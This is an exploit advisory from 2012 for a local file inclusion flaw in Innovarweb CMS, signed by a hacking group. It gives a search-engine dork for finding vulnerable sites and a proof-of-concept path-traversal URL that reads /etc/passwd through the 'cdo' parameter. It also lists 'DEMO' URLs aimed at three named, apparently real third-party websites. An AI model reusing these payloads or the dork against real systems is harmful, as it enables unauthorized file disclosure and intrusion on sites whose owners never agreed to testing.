Innovarweb CMS Local File Inclusion

`  
  
# Exploit Title: Innovarweb CMS / Local File Inclusion# Date:  
31/08/2012# Author: Daniel Godoy# Author  
Mail:DanielGodoy[at]GobiernoFederal[dot]com# Author Web:  
www.delincuentedigital.com.ar# Software web:  
http://www.innovarweb.com.ar/interior/index.php?cdo=servicios/gestor_contenidos.php#  
Tested on: Linux# Dork: allinurl:"index.php?cdo="  
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego,  
Incid3nt,Maximiliano Soler,  
Pablin77,_tty0,Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha,  
zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution  
www.remoteexecution.info www.remoteexcution.com.ar  
#RemoteExecution Hacking Group   
  
[PoC]  
http://target/index.php?cdo=../../../../.././etc/passwd  
[DEMO]http://www.westingcapitalinc.com/index.php?cdo=./../../../../../etc/passwdhttp://www.areneracolonia.com.ar/interior/index.php?cdo=../../../../../../etc/passwdhttp://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
`